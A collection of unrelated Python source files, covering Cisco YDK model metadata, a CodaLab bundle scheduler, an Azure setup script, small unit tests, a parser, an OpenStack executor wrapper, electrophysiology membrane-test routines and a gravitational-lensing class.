_MetaInfoClassMember('node', REFERENCE_LIST, 'Node' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_shellutil_filesystem_oper', 'FileSystem.Node',
[], [],
''' Node ID
''',
'node',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
],
'Cisco-IOS-XR-shellutil-filesystem-oper',
'file-system',
_yang_ns._namespaces['Cisco-IOS-XR-shellutil-filesystem-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_shellutil_filesystem_oper'
),
},
}
_meta_table['FileSystem.Node.FileSystem_']['meta_info'].parent =_meta_table['FileSystem.Node']['meta_info']
_meta_table['FileSystem.Node']['meta_info'].parent =_meta_table['FileSystem']['meta_info']
|
import datetime
import logging
import os
import random
import re
import sys
import threading
import time
import traceback
from codalab.objects.permission import check_bundles_have_read_permission
from codalab.common import PermissionError
from codalab.lib import bundle_util, formatting, path_util
from codalabworker.file_util import remove_path
from codalabworker.bundle_state import State
logger = logging.getLogger(__name__)
WORKER_TIMEOUT_SECONDS = 60
class BundleManager(object):
"""
Assigns run bundles to workers and makes make bundles.
"""
@staticmethod
def create(codalab_manager):
config = codalab_manager.config.get('workers')
if not config:
print >>sys.stderr, 'config.json file missing a workers section.'
exit(1)
from codalab.worker.default_bundle_manager import DefaultBundleManager
self = DefaultBundleManager()
self._model = codalab_manager.model()
self._worker_model = codalab_manager.worker_model()
self._bundle_store = codalab_manager.bundle_store()
self._upload_manager = codalab_manager.upload_manager()
self._exiting_lock = threading.Lock()
self._exiting = False
self._make_uuids_lock = threading.Lock()
self._make_uuids = set()
def parse(to_value, field):
return to_value(config[field]) if field in config else None
self._max_request_time = parse(formatting.parse_duration, 'max_request_time')
self._max_request_memory = parse(formatting.parse_size, 'max_request_memory')
self._max_request_disk = parse(formatting.parse_size, 'max_request_disk')
self._default_cpu_image = config.get('default_cpu_image')
self._default_gpu_image = config.get('default_gpu_image')
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)
return self
def run(self, sleep_time):
logger.info('Bundle manager running.')
while not self._is_exiting():
try:
self._run_iteration()
except Exception:
traceback.print_exc()
time.sleep(sleep_time)
while self._is_making_bundles():
time.sleep(sleep_time)
def signal(self):
with self._exiting_lock:
self._exiting = True
def _is_exiting(self):
with self._exiting_lock:
return self._exiting
def _run_iteration(self):
self._stage_bundles()
self._make_bundles()
self._schedule_run_bundles()
def _schedule_run_bundles(self):
"""
Sub classes should implement this. See DefaultBundleManager
"""
raise NotImplementedError
def _stage_bundles(self):
"""
Stages bundles by:
1) Failing any bundles that have any missing or failed dependencies.
2) Staging any bundles that have all ready dependencies.
"""
bundles = self._model.batch_get_bundles(state=State.CREATED)
parent_uuids = set(dep.parent_uuid for bundle in bundles for dep in bundle.dependencies)
parents = self._model.batch_get_bundles(uuid=parent_uuids)
all_parent_states = {parent.uuid: parent.state for parent in parents}
all_parent_uuids = set(all_parent_states)
bundles_to_fail = []
bundles_to_stage = []
for bundle in bundles:
parent_uuids = set(dep.parent_uuid for dep in bundle.dependencies)
try:
check_bundles_have_read_permission(
self._model, self._model.get_user(bundle.owner_id), parent_uuids
)
except PermissionError as e:
bundles_to_fail.append((bundle, str(e)))
continue
missing_uuids = parent_uuids - all_parent_uuids
if missing_uuids:
bundles_to_fail.append(
(bundle, 'Missing parent bundles: %s' % ', '.join(missing_uuids))
)
continue
parent_states = {uuid: all_parent_states[uuid] for uuid in parent_uuids}
acceptable_states = [State.READY]
if bundle.metadata.allow_failed_dependencies:
acceptable_states.append(State.FAILED)
acceptable_states.append(State.KILLED)
else:
failed_uuids = [
uuid for uuid, state in parent_states.iteritems() if state == State.FAILED
]
killed_uuids = [
uuid for uuid, state in parent_states.iteritems() if state == State.KILLED
]
failure_message = ''
if failed_uuids:
failure_message += ' Parent bundles failed: %s' % ', '.join(failed_uuids)
if killed_uuids:
failure_message += ' Parent bundles were killed: %s' % ', '.join(killed_uuids)
if failure_message:
failure_message += ' (Please use the --allow-failed-dependencies flag to depend on results fo failed or killed bundles)'
bundles_to_fail.append((bundle, failure_message))
continue
if all(state in acceptable_states for state in parent_states.itervalues()):
bundles_to_stage.append(bundle)
for bundle, failure_message in bundles_to_fail:
logger.info('Failing bundle %s: %s', bundle.uuid, failure_message)
self._model.update_bundle(
bundle, {'state': State.FAILED, 'metadata': {'failure_message': failure_message}}
)
for bundle in bundles_to_stage:
logger.info('Staging %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.STAGED})
def _make_bundles(self):
# Re-stage any stuck bundles. This would happen if the bundle manager
# died.
for bundle in self._model.batch_get_bundles(state=State.MAKING, bundle_type='make'):
if not self._is_making_bundle(bundle.uuid):
logger.info('Re-staging make bundle %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.STAGED})
for bundle in self._model.batch_get_bundles(state=State.STAGED, bundle_type='make'):
logger.info('Making bundle %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.MAKING})
with self._make_uuids_lock:
self._make_uuids.add(bundle.uuid)
# Making a bundle could take time, so do the work in a separate
# thread to ensure quick scheduling.
threading.Thread(target=BundleManager._make_bundle, args=[self, bundle]).start()
def _is_making_bundles(self):
with self._make_uuids_lock:
return bool(self._make_uuids)
def _is_making_bundle(self, uuid):
with self._make_uuids_lock:
return uuid in self._make_uuids
def _make_bundle(self, bundle):
try:
path = os.path.normpath(self._bundle_store.get_bundle_location(bundle.uuid))
deps = []
for dep in bundle.dependencies:
parent_bundle_path = os.path.normpath(
self._bundle_store.get_bundle_location(dep.parent_uuid)
)
dependency_path = os.path.normpath(
os.path.join(parent_bundle_path, dep.parent_path)
)
if not dependency_path.startswith(parent_bundle_path) or (
not os.path.islink(dependency_path) and not os.path.exists(dependency_path)
):
raise Exception(
'Invalid dependency %s'
% (path_util.safe_join(dep.parent_uuid, dep.parent_path))
)
child_path = os.path.normpath(os.path.join(path, dep.child_path))
if not child_path.startswith(path):
raise Exception('Invalid key for dependency: %s' % (dep.child_path))
deps.append((dependency_path, child_path))
remove_path(path)
if len(deps) == 1 and deps[0][1] == path:
path_util.copy(deps[0][0], path, follow_symlinks=False)
else:
os.mkdir(path)
for dependency_path, child_path in deps:
path_util.copy(dependency_path, child_path, follow_symlinks=False)
self._upload_manager.update_metadata_and_save(bundle, enforce_disk_quota=True)
logger.info('Finished making bundle %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.READY})
except Exception as e:
logger.info('Failing bundle %s: %s', bundle.uuid, str(e))
self._model.update_bundle(
bundle, {'state': State.FAILED, 'metadata': {'failure_message': str(e)}}
)
finally:
with self._make_uuids_lock:
self._make_uuids.remove(bundle.uuid)
def _cleanup_dead_workers(self, workers, callback=None):
"""
Clean-up workers that we haven't heard from for more than WORKER_TIMEOUT_SECONDS seconds.
Such workers probably died without checking out properly.
"""
for worker in workers.workers():
if datetime.datetime.now() - worker['checkin_time'] > datetime.timedelta(
seconds=WORKER_TIMEOUT_SECONDS
):
logger.info(
'Cleaning up dead worker (%s, %s)', worker['user_id'], worker['worker_id']
)
self._worker_model.worker_cleanup(worker['user_id'], worker['worker_id'])
workers.remove(worker)
if callback is not None:
callback(worker)
def _restage_stuck_starting_bundles(self, workers):
"""
Moves bundles that got stuck in the STARTING state back to the STAGED
state so that they can be scheduled to run again.
"""
for bundle in self._model.batch_get_bundles(state=State.STARTING, bundle_type='run'):
if (
not workers.is_running(bundle.uuid)
or time.time() - bundle.metadata.last_updated > 5 * 60
): # Run message went missing.
logger.info('Re-staging run bundle %s', bundle.uuid)
if self._model.restage_bundle(bundle):
workers.restage(bundle.uuid)
def _acknowledge_recently_finished_bundles(self, workers):
"""
Acknowledges recently finished bundles to workers so they can discard run information
"""
for bundle in self._model.batch_get_bundles(state=State.FINALIZING, bundle_type='run'):
worker = workers.get_bundle_worker(bundle.uuid)
if worker is None:
logger.info(
'Bringing bundle offline %s: %s', bundle.uuid, 'No worker claims bundle'
)
self._model.set_offline_bundle(bundle)
elif self._worker_model.send_json_message(
worker['socket_id'], {'type': 'mark_finalized', 'uuid': bundle.uuid}, 0.2
):
logger.info('Acknowleded finalization of run bundle %s', bundle.uuid)
self._model.finish_bundle(bundle)
def _bring_offline_stuck_running_bundles(self, workers):
"""
Make bundles that got stuck in the RUNNING or PREPARING state into WORKER_OFFLINE state.
Bundles in WORKER_OFFLINE state can be moved back to the RUNNING or PREPARING state if a
worker resumes the bundle indicating that it's still in one of those states.
"""
active_bundles = self._model.batch_get_bundles(
state=State.RUNNING, bundle_type='run'
) + self._model.batch_get_bundles(state=State.PREPARING, bundle_type='run')
now = time.time()
for bundle in active_bundles:
failure_message = None
if not workers.is_running(bundle.uuid):
failure_message = 'No worker claims bundle'
if now - bundle.metadata.last_updated > WORKER_TIMEOUT_SECONDS:
failure_message = 'Worker offline'
if failure_message is not None:
logger.info('Bringing bundle offline %s: %s', bundle.uuid, failure_message)
self._model.set_offline_bundle(bundle)
def _schedule_run_bundles_on_workers(self, workers, user_owned):
"""
Schedules STAGED bundles to run on the given workers. If user_owned is
True, then schedules on workers run by the owner of each bundle.
Otherwise, uses CodaLab-owned workers, which have user ID root_user_id.
"""
for bundle in self._model.batch_get_bundles(state=State.STAGED, bundle_type='run'):
if user_owned:
workers_list = workers.user_owned_workers(bundle.owner_id)
else:
workers_list = workers.user_owned_workers(self._model.root_user_id)
workers_list = self._filter_and_sort_workers(workers_list, bundle)
for worker in workers_list:
if self._try_start_bundle(workers, worker, bundle):
break
else:
continue # Try the next worker.
def _deduct_worker_resources(self, workers_list):
"""
From each worker, subtract resources used by running bundles. Modifies the list.
"""
for worker in workers_list:
for uuid in worker['run_uuids']:
bundle = self._model.get_bundle(uuid)
worker['cpus'] -= self._compute_request_cpus(bundle)
worker['gpus'] -= self._compute_request_gpus(bundle)
worker['memory_bytes'] -= self._compute_request_memory(bundle)
def _filter_and_sort_workers(self, workers_list, bundle):
"""
Filters the workers to those that can run the given bundle and returns
the list sorted in order of preference for running the bundle.
"""
# keep track of which workers have GPUs
has_gpu = {}
for worker in workers_list:
worker_id = worker['worker_id']
has_gpu[worker_id] = worker['gpus'] > 0
# deduct worker resources based on running bundles
self._deduct_worker_resources(workers_list)
# Filter by CPUs.
request_cpus = self._compute_request_cpus(bundle)
if request_cpus:
workers_list = filter(lambda worker: worker['cpus'] >= request_cpus, workers_list)
# Filter by GPUs.
request_gpus = self._compute_request_gpus(bundle)
if request_gpus:
workers_list = filter(lambda worker: worker['gpus'] >= request_gpus, workers_list)
# Filter by memory.
request_memory = self._compute_request_memory(bundle)
if request_memory:
workers_list = filter(
lambda worker: worker['memory_bytes'] >= request_memory, workers_list
)
# Filter by tag.
request_queue = bundle.metadata.request_queue
if request_queue:
tagm = re.match('tag=(.+)', request_queue)
if tagm:
workers_list = filter(lambda worker: worker['tag'] == tagm.group(1), workers_list)
else:
# We don't know how to handle this type of request queue
# argument.
return []
# Sort workers list according to these keys in the following succession:
# - whether the worker is a CPU-only worker, if the bundle doesn't request GPUs
# - number of dependencies available, descending
# - number of free cpus, descending
# - random key
#
# Breaking ties randomly is important, since multiple workers frequently
# have the same number of dependencies and free CPUs for a given bundle
# (in particular, bundles with no dependencies) and we may end up
# selecting the same worker over and over again for new jobs. While this
# is not a problem for the performance of the jobs themselves, this can
# cause one worker to collect a disproportionate number of dependencies
# in its cache.
needed_deps = set(map(lambda dep: (dep.parent_uuid, dep.parent_path), bundle.dependencies))
def get_sort_key(worker):
deps = set(worker['dependencies'])
worker_id = worker['worker_id']
# if the bundle doesn't request GPUs (only request CPUs), prioritize workers that don't have GPUs
gpu_priority = self._compute_request_gpus(bundle) or not has_gpu[worker_id]
return (gpu_priority, len(needed_deps & deps), worker['cpus'], random.random())
workers_list.sort(key=get_sort_key, reverse=True)
return workers_list
def _try_start_bundle(self, workers, worker, bundle):
"""
Tries to start running the bundle on the given worker, returning False
if that failed.
"""
if self._model.set_starting_bundle(bundle, worker['user_id'], worker['worker_id']):
workers.set_starting(bundle.uuid, worker)
if (
self._worker_model.shared_file_system
and worker['user_id'] == self._model.root_user_id
):
# On a shared file system we create the path here to avoid NFS
# directory cache issues.
path = self._bundle_store.get_bundle_location(bundle.uuid)
remove_path(path)
os.mkdir(path)
if self._worker_model.send_json_message(
worker['socket_id'], self._construct_run_message(worker, bundle), 0.2
):
logger.info('Starting run bundle %s', bundle.uuid)
return True
else:
self._model.restage_bundle(bundle)
workers.restage(bundle.uuid)
return False
else:
return False
def _compute_request_cpus(self, bundle):
"""
Compute the CPU limit used for scheduling the run.
The default of 1 is for backwards compatibilty for
runs from before when we added client-side defaults
"""
if not bundle.metadata.request_cpus:
return 1
return bundle.metadata.request_cpus
def _compute_request_gpus(self, bundle):
"""
Compute the GPU limit used for scheduling the run.
The default of 0 is for backwards compatibilty for
runs from before when we added client-side defaults
"""
if bundle.metadata.request_gpus is None:
return 0
return bundle.metadata.request_gpus
def _compute_request_memory(self, bundle):
"""
Compute the memory limit used for scheduling the run.
The default of 2g is for backwards compatibilty for
runs from before when we added client-side defaults
"""
if not bundle.metadata.request_memory:
return formatting.parse_size('2g')
return formatting.parse_size(bundle.metadata.request_memory)
def _compute_request_disk(self, bundle):
"""
Compute the disk limit used for scheduling the run.
The default is min(disk quota the user has left, global max)
"""
if not bundle.metadata.request_disk:
return min(
self._model.get_user_disk_quota_left(bundle.owner_id) - 1, self._max_request_disk
)
return formatting.parse_size(bundle.metadata.request_disk)
def _compute_request_time(self, bundle):
"""
Compute the time limit used for scheduling the run.
The default is min(time quota the user has left, global max)
"""
if not bundle.metadata.request_time:
return min(
self._model.get_user_time_quota_left(bundle.owner_id) - 1, self._max_request_time
)
return formatting.parse_duration(bundle.metadata.request_time)
def _get_docker_image(self, bundle):
"""
Set docker image to be the default if not specified
Unlike other metadata fields this can actually be None
from client
"""
if not bundle.metadata.request_docker_image:
if bundle.metadata.request_gpus:
return self._default_gpu_image
else:
return self._default_cpu_image
return bundle.metadata.request_docker_image
def _construct_run_message(self, worker, bundle):
"""
Constructs the run message that is sent to the given worker to tell it
to run the given bundle.
"""
message = {}
message['type'] = 'run'
message['bundle'] = bundle_util.bundle_to_bundle_info(self._model, bundle)
if self._worker_model.shared_file_system and worker['user_id'] == self._model.root_user_id:
message['bundle']['location'] = self._bundle_store.get_bundle_location(bundle.uuid)
for dependency in message['bundle']['dependencies']:
dependency['location'] = self._bundle_store.get_bundle_location(
dependency['parent_uuid']
)
# Figure out the resource requirements.
resources = message['resources'] = {}
resources['request_cpus'] = self._compute_request_cpus(bundle)
resources['request_gpus'] = self._compute_request_gpus(bundle)
resources['docker_image'] = self._get_docker_image(bundle)
resources['request_time'] = self._compute_request_time(bundle)
resources['request_memory'] = self._compute_request_memory(bundle)
resources['request_disk'] = self._compute_request_disk(bundle)
resources['request_network'] = bundle.metadata.request_network
return message
|
#!/usr/bin/env python
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
from setuptools import setup
# azure v0.x is not compatible with this package
# azure v0.x used to have a __version__ attribute (newer versions don't)
try:
import azure
try:
ver = azure.__version__
raise Exception(
'This package is incompatible with azure=={}. '.format(ver) +
'Uninstall it with "pip uninstall azure".'
)
except AttributeError:
pass
except ImportError:
pass
setup(
name='azure-servicemanagement-legacy',
version='0.20.3',
description='Microsoft Azure Legacy Service Management Client Library for Python',
long_description=open('README.rst', 'r').read(),
license='Apache License 2.0',
author='Microsoft Corporation',
author_email='ptvshelp@microsoft.com',
url='https://github.com/Azure/azure-sdk-for-python',
classifiers=[
'Development Status :: 4 - Beta',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'License :: OSI Approved :: Apache Software License',
],
zip_safe=False,
packages=[
'azure',
'azure.servicemanagement',
'azure.servicemanagement._http',
],
install_requires=[
'azure-common',
'requests',
],
extras_require = {
'get_certificate_from_publish_settings' : ['pyopenssl']
},
)
|
import gron
def test_version():
assert hasattr(gron, '__VERSION__')
|
# Copyright 2016-2019 California Institute of Technology.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..oceancolor import OceanColor
import os
from nose.tools import assert_raises
import unittest
class TestOceanColor(unittest.TestCase):
@classmethod
def setUp(self):
self.oceancolor = OceanColor()
# test case for the function file_search()
def test_file_search(self):
data = self.oceancolor.file_search(sensor='octs', sdate='1996-11-01', edate='1997-01-01',
dtype='L3b', add_url='1', results_as_file='1', search='*DAY_CHL*')
assert data != None
print(data)
assert type(data) is type(u'')
assert len(data) != 0
# must have a valid sensor AND either 'search' OR 'sub-id'
data2 = self.oceancolor.file_search(sensor='octs', sub_id='2218')
assert data2 != None
assert_raises(Exception, self.oceancolor.file_search, sensor='random')
assert_raises(Exception, self.oceancolor.file_search, sdate='1996-11-01', edate='1997-01-01',
dtype='L3b', add_url='1', results_as_file='1', search='*DAY_CHL*')
# test case for the function get_file(()
def test_get_file(self):
url = 'https://oceandata.sci.gsfc.nasa.gov/cgi/getfile/O1996307.L3b_DAY_CHL.nc'
path = os.path.dirname(os.path.abspath(__file__))
granule_name = self.oceancolor.get_file(url, path)
assert granule_name != None
assert_raises(Exception, self.oceancolor.get_file,
url='ABCDEF')
path = os.path.join(os.path.dirname(__file__), granule_name)
os.remove(path)
|
from rply import ParserGenerator
from poketype.ast import Number, Boolean, NegNumber
class DataTypes():
def __init__(self, pg: ParserGenerator) -> None:
@pg.production('expression : NUMBER')
def expression_number(p):
return Number(int(p[0].getstr()))
@pg.production('expression : BOOLEAN')
def expression_number(p):
b_val = p[0].getstr()
if b_val == "true":
return Boolean(True)
else:
return Boolean(False)
@pg.production('expression : NEG NUMBER')
def expression_number_neg(p):
b_val = p[1].getstr()
return NegNumber(int(p[1].getstr()) * -1)
|
#!/usr/bin/env python
un='BZh91AY&SYA\xaf\x82\r\x00\x00\x01\x01\x80\x02\xc0\x02\x00 \x00!\x9ah3M\x07<]\xc9\x14\xe1BA\x06\xbe\x084'
pw='BZh91AY&SY\x94$|\x0e\x00\x00\x00\x81\x00\x03$ \x00!\x9ah3M\x13<]\xc9\x14\xe1BBP\x91\xf08'
import bz2
print bz2.BZ2Decompressor().decompress(un)
# huge
print bz2.BZ2Decompressor().decompress(pw)
# file
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic exec utility that allows us to set the
execute and root_helper attributes for putils.
Some projects need their own execute wrapper
and root_helper settings, so this provides that hook.
"""
from cinder.openstack.common import processutils as putils
class Executor(object):
def __init__(self, execute=putils.execute, root_helper="sudo",
*args, **kwargs):
self.set_execute(execute)
self.set_root_helper(root_helper)
def set_execute(self, execute):
self._execute = execute
def set_root_helper(self, helper):
self._root_helper = helper
|
"""
Membrane test routines for voltage clamp experiments.
creates abf.MTs[sweep]={} #with keys like Ih, Ra, Rm, etc
Example usage:
abf=swhlab.ABF('../abfs/group/16701010.abf')
swhlab.memtest.memtest(abf) #performs memtest on all sweeps
swhlab.memtest.checkSweep(abf) #lets you eyeball check how it did
pylab.show()
"""
import os
import sys
import pylab
import numpy as np
import time
import swhlab
import swhlab.core.common as cm
exampleABF=swhlab.ABF()
def memtestSweepVC(abf=exampleABF):
"""
perform memtest on current sweep in VC mode. Return Ih, Ra, Rm, etc.
All variable names are explained in /swhlab/docs/memtest.ppt
"""
if abf.protoSeqY[1]>abf.protoSeqY[0] or len(abf.protoSeqY)<3:
return "protocol doesn't step down and back up"
TA,TB=int(abf.protoSeqX[1]),int(abf.protoSeqX[2])
dT=int(TB-TA)
T1A=int(TA+.5*dT)
T1B=int(TA+.9*dT)
T2A=T1A+dT
T2B=T1B+dT
P1=np.average(abf.dataY[T1A:T1B])
P2=np.average(abf.dataY[T2A:T2B])
dI=P2-P1
dV=abf.protoSeqY[2]-abf.protoSeqY[1]
PP=np.max(abf.dataY[TB:TB+100])# peak found within first 100 points
TP=np.where(abf.dataY[TB:TB+150]==PP)[0][0]+TB
dP=PP-P1
dTC=PP-P2
PCA=P2+.9*dTC # upper fraction for Cm detection
PCB=P2+.1*dTC # upper fraction for Cm detection
PCtau=P2+.37*dTC # crossing point of theoretical tau
TCA=np.where(abf.dataY[TP:T2A]<PCA)[0][0]+TP
TCB=np.where(abf.dataY[TP:T2A]<PCB)[0][0]+TP
dTCT=TCB-TCA #number of points available for fitting
Ih=P2
Ra=(dV*10**3)/(PP-P2) #MOhm=uV/pA
Rm=(dV*10**3)/(P2-P1) #MOhm=uV/pA
fitM,fitT,fitB,fitTau=cm.fit_exp(abf.dataY[TCA:TCB]) #same units as given
fitTau=fitTau*1000/abf.rate #time constant convert to ms units
Tv=fitTau #time constant of extrinsic voltage clamp
Cm=Tv/Ra*1000 #us/MOhm is pF
Tm=Rm*Cm/1000 #time constant of cell membrane (intrinsic voltage clamp)
del abf
return locals()
def memtestIC(abf=exampleABF):
"""
IC memtest is different. Make an average sweep, then curve fit it.
This only RETURNS the memtest, it does not assign it.
"""
if abf.protoSeqY[1]>abf.protoSeqY[0] or len(abf.protoSeqY)<3:
return "protocol doesn't step down and back up"
abf.baseline=[abf.protoSeqX[1]/abf.rate*.75,abf.protoSeqX[1]/abf.rate]
T1A,T1B=np.array(abf.baseline)*abf.rate
Xs,Ys,Er=abf.average_sweep()
T2A=abf.protoSeqX[2]-abf.protoSeqX[1]
T2B=abf.protoSeqX[2]
M2=np.average(Ys[T2A:T2B])
MCA=.1*M2 # set 90% here
MCB=.9*M2 # set 10% here
TCA=np.where(Ys<MCA)[0][0]
TCB=np.where(Ys<MCB)[0][0]
m,t,b,tc=cm.fit_exp(Ys[TCA:TCB]) #do the fit!
dI=abs(abf.protoSeqY[2]-abf.protoSeqY[1]) #pA
dV=abs(M2) #mV
Rm=dV/dI*1000 #uV/pA = MOhm
Cm=tc/Rm #ms/MOhm
del abf,Ys,Xs,Er
return locals() #convert to structured array
def memtest(abf=exampleABF,firstSweepOnly=False,plotToo=False,saveToo=True):
"""perform memtest on all sweeps."""
timeStart=time.clock()
if abf.units=="mV":
abf.MTs = memtestIC(abf)
else:
abf.MTs=[None]*abf.sweeps
for sweep in range(abf.sweeps):
abf.setSweep(sweep)
result=memtestSweepVC(abf)
if type(result) is dict:
abf.MTs[abf.currentSweep]=result
else:
print("MEMTEST FAILED - sweep %d -"%sweep,result)
if firstSweepOnly:
return
abf.MTs = cm.matrixfromDicts(abf.MTs) #convert to structured array
took=time.clock()-timeStart
print(" -- memtest performed on %d sweeps in %.02f ms"%(abf.sweeps,took*1000))
if saveToo:
abf.saveThing(abf.MTs,"MTs")
def plot_standard4(abf=exampleABF):
"""make a standard memtest plot showing Ih, Ra, etc. with time."""
if abf.sweeps<2:
return
swhlab.plot.new(abf)
Xs=np.arange(abf.sweeps)*abf.sweepInterval/60
subplots=[221,222,223,224]
features=['Ih','Ra','Rm','Cm']
units=['pA','MOhm','MOhm','pF']
for subplot,feature,unit in zip(subplots,features,units):
pylab.subplot(subplot)
pylab.grid(alpha=.5)
#pylab.title(feature)
pylab.plot(Xs,cm.dictVals(abf.MTs,feature),'.-',alpha=.5)
pylab.xlabel(None)
pylab.ylabel("%s (%s)"%(feature,unit))
swhlab.plot.comments(abf,True)
pylab.margins(0,.1)
def checkSweepIC(abf=exampleABF,sweep=0):
"""Produce an eyeball-ready indication how the MT was calculated in IC."""
_keys = abf.MTs.dtype.names
for key in _keys:
globals()[key]=abf.MTs[key] # only global for this module, that's fine
fitted=cm.algo_exp(np.arange(TCB-TCA),m,t,b)
swhlab.plot.new(abf,forceNewFigure=True)
Xs,Ys,Er=abf.average_sweep()
for subplot in [121,122]:
pylab.subplot(subplot)
pylab.axhline(0,color='b',lw=2,alpha=.5,ls="--")
pylab.axhline(M2,color='b',lw=2,alpha=.5,ls="--")
swhlab.plot.sweep(abf,'all',rainbow=False,color='#CCCCCC',alpha=.5)
pylab.plot(Xs,Ys,color='k',alpha=.5)
pylab.plot(Xs[T1A:T1B],Ys[T1A:T1B],color='b',lw=2)
pylab.plot(Xs[T2A:T2B],Ys[T2A:T2B],color='b',lw=2)
pylab.plot(abf.dataX[TCA:TCB],fitted,color='r',lw=2,ls='--')
pylab.axis([(TCA-100)/abf.rate,(TCB+100)/abf.rate,None,None])
pylab.tight_layout()
msg="tau: %.02f ms\n"%(tc/abf.rate*1000)
msg+="Rm: %.02f MOhm\n"%(Rm)
msg+="Cm: %.02f pF"%(Cm)
pylab.annotate(msg,(.75,.95),ha='left',va='top',weight='bold',family='monospace',
xycoords='figure fraction',size=12,color='g')
swhlab.plot.annotate(abf)
return
def checkSweep(abf=exampleABF,sweep=0):
"""Produce an eyeball-ready indication how the MT was calculated in VC."""
if abf.units=="mV":
return checkSweepIC(abf,sweep)
if abf.MTs[sweep] is None:
return False #no memtest data even found
_keys = abf.MTs[sweep].dtype.names
for key in _keys:
globals()[key]=abf.MTs[sweep][key] # only global for this module, that's fine.
_msg2="Average (n=%d)\n"%abf.sweeps
_msg=""
for i in range(len(_keys)):
_msg+="%s=%s\n"%(_keys[i],abf.MTs[sweep][i])
if _keys[i] in ['Ih','Ra','Rm','Cm','Tv','Tm']:
_msg2+="%s=%.02f\n"%(_keys[i],abf.MTs[sweep][i])
fitted=cm.algo_exp(np.arange(TCB-TCA),fitM,fitT,fitB)
pylab.figure(figsize=(8,8))
for subplot in [211,212]:
pylab.subplot(subplot)
#pylab.plot(abf.dataX,abf.dataY,alpha=.2,color='k',lw=2)
pylab.plot(abf.dataX[:TCA],abf.dataY[:TCA],alpha=.2,color='k',lw=2)
pylab.plot(abf.dataX[TCB:],abf.dataY[TCB:],alpha=.2,color='k',lw=2)
pylab.plot(abf.dataX[TCA:TCB],abf.dataY[TCA:TCB],'o',alpha=.5,lw=4,mfc='none',mec='r')
pylab.plot(abf.dataX[T1A:T1B],abf.dataY[T1A:T1B],alpha=.4,color='b')
pylab.plot(abf.dataX[T2A:T2B],abf.dataY[T2A:T2B],alpha=.4,color='b')
pylab.plot(abf.dataX[TCA:TCB],fitted,color='k',lw=2,ls="--")
for i in [TA, TB]:
pylab.axvline(i/abf.rate,color='k',ls='--',alpha=.4)
for i in [P1,P2]:
pylab.axhline(i,color='b',ls="--",alpha=.5)
for i in [PCA,PCB,PP]:
pylab.axhline(i,color='g',ls="--",alpha=.5)
pylab.tight_layout()
pylab.subplots_adjust(right=0.75)
pylab.annotate(_msg,(.8,.75),ha='left',va='top',alpha=.5,
xycoords='figure fraction',family='monospace',size=10)
pylab.annotate(_msg2,(.8,.95),ha='left',va='top',weight='bold',family='monospace',
xycoords='figure fraction',size=12,color='g')
pylab.subplot(211)
pylab.axis([None,abf.dataX[T2B]+.05,None,None])
pylab.subplot(212)
pylab.axis([(TB-20)/abf.rate,(TCB+20)/abf.rate,P1-20,PP+20])
swhlab.plot.annotate(abf)
for key in _keys:
del key #be clean about screwing with globals()
return
def test():
"""voltage clamp MT."""
abf=swhlab.ABF(r'C:\Apps\pythonModules\abfs\16701010.abf')
swhlab.memtest.memtest(abf) #performs memtest on all sweeps
swhlab.memtest.checkSweep(abf) #lets you eyeball check how it did
pylab.show()
def test2():
"""current clamp MT."""
abf=swhlab.ABF(r'C:\Apps\pythonModules\abfs\16701006.abf')
swhlab.memtest.memtest(abf) #performs memtest on all sweeps
swhlab.memtest.checkSweep(abf) #lets you eyeball check how it did
pylab.show()
if __name__=="__main__":
#test()
#test2()
test3()
print("DONE")
|
import numpy as np
from lenstronomy.Cosmo.background import Background
from lenstronomy.LensModel.profile_list_base import ProfileListBase
import lenstronomy.Util.constants as const
__all__ = ['MultiPlaneBase']
class MultiPlaneBase(ProfileListBase):
"""
Multi-plane lensing class
The lens model deflection angles are in units of reduced deflections from the specified redshift of the lens to the
source redshift of the class instance.
"""
def __init__(self, lens_model_list, lens_redshift_list, z_source_convention, cosmo=None,
numerical_alpha_class=None, cosmo_interp=False, z_interp_stop=None, num_z_interp=100):
"""
A description of the recursive multi-plane formalism can be found e.g. here: https://arxiv.org/abs/1312.1536
:param lens_model_list: list of lens model strings
:param lens_redshift_list: list of floats with redshifts of the lens models indicated in lens_model_list
:param z_source_convention: float, redshift of a source to define the reduced deflection angles of the lens
models. If None, 'z_source' is used.
:param cosmo: instance of astropy.cosmology
:param numerical_alpha_class: an instance of a custom class for use in NumericalAlpha() lens model
(see documentation in Profiles/numerical_alpha)
"""
if z_interp_stop is None:
z_interp_stop = z_source_convention
self._cosmo_bkg = Background(cosmo, interp=cosmo_interp, z_stop=z_interp_stop, num_interp=num_z_interp)
